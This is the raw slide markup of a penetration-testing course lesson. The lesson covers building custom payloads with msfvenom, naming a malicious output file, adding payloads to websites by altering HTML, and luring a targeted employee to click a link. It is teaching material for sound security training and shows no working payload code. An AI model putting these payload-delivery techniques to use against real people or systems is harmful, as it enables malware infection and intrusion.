                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>creates an output file, naming the file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>malware.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>) and location (inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>the /tmp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>directory).</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2168" name="Google Shape;2168;p118"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="2163" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4440700" y="1688025"/>
            <a:ext cx="0" cy="532800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF00FF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2169" name="Google Shape;2169;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000150" y="2723038"/>
            <a:ext cx="159900" cy="195600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="0D78B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170" name="Google Shape;2170;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1198825" y="2723038"/>
            <a:ext cx="2085300" cy="1956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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="375175" y="2714600"/>
            <a:ext cx="586200" cy="1956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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3321650" y="2723038"/>
            <a:ext cx="429900" cy="195600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="0D78B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173" name="Google Shape;2173;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3791500" y="2723038"/>
            <a:ext cx="1420800" cy="1956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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5256800" y="2723038"/>
            <a:ext cx="429900" cy="1956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5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2175" name="Google Shape;2175;p118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706325" y="2723038"/>
            <a:ext cx="1146300" cy="195600"/>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1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2181" name="Google Shape;2181;p119"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Creating Custom Payloads</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use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100" b="1">
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>’s </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>custom payload options to build a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>malicious file that will link to a webpage </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>for the targeted employee to click on.</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2182" name="Google Shape;2182;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121"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2193" name="Google Shape;2193;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16</a:t>
            </a:fld>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2194" name="Google Shape;2194;p121"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600775" y="1246025"/>
            <a:ext cx="4958400" cy="3440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2CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>For the rest of this class, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>we will work on an activity </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>that simulates all levels of a penetration test engagement. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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p122"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273900" y="1042875"/>
            <a:ext cx="8595300" cy="2764200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="2560300" tIns="91425" rIns="0" bIns="91425"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Penetration Test</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In this activity you will gain access to a target </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>machine and retrieve valuable data. You will also complete a report detailing the process. </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Unfinished work will be completed for homework.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2100"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2200" name="Google Shape;2200;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
        <p:nvSpPr>
          <p:cNvPr id="2201" name="Google Shape;2201;p122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6328725" y="3891975"/>
            <a:ext cx="2470800" cy="8823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p12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2207" name="Google Shape;2207;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2043"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2044" name="Google Shape;2044;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45" name="Google Shape;2045;p10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7"/>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Create custom payloads.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2047" name="Google Shape;2047;p10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7"/>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latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Add payloads to websites by altering HTML. </a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2050" name="Google Shape;2050;p107"/>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Assess your overall penetration test engagement skills.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2051" name="Google Shape;2051;p107"/>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2" name="Google Shape;2052;p107"/>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3" name="Google Shape;2053;p107"/>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2054" name="Google Shape;2054;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55" name="Google Shape;2055;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 be able to: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pic>
        <p:nvPicPr>
          <p:cNvPr id="2060" name="Google Shape;2060;p108"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="536"/>
            <a:ext cx="9143997" cy="5142427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2061" name="Google Shape;2061;p108"/>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endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2062" name="Google Shape;2062;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="477550"/>
            <a:ext cx="3775200" cy="23223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r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>The exploitation of services</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>is less common than it was</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>a decade ago. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="F3F3F3"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>This is due to the use of defense countermeasures </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>like endpoint detection and response,  AV solutions, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and IPS/IDS implementation.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="F3F3F3"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2063" name="Google Shape;2063;p108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="3307250"/>
            <a:ext cx="3424800" cy="1005600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="91425" rIns="0" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>While patching mitigates vulnerable services, attackers will deliver custom payloads through social engineering if they cannot exploit services.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2064" name="Google Shape;2064;p108"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3159563"/>
            <a:ext cx="2955300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2065" name="Google Shape;2065;p108"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3860625" y="407575"/>
            <a:ext cx="4821772" cy="4509076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2066" name="Google Shape;2066;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3</a:t>
            </a:fld>
            <a:endParaRPr sz="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pic>
        <p:nvPicPr>
          <p:cNvPr id="2071" name="Google Shape;2071;p10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072" name="Google Shape;2072;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a:t>
            </a:fld>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2073" name="Google Shape;2073;p109"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3590825" y="914450"/>
            <a:ext cx="4898400" cy="3440700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="182875" rIns="274300" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Attackers typically build custom payloads that they can use in phishing emails or add to their websites. When an unsuspecting user clicks the link for the malicious payload, their computer is infected. </a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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2079" name="Google Shape;2079;p110"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3126825" y="1140050"/>
            <a:ext cx="5349900" cy="178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500" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Remember…</a:t>
            </a:r>
            <a:endParaRPr sz="2500" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> is the shell code that</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2500">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
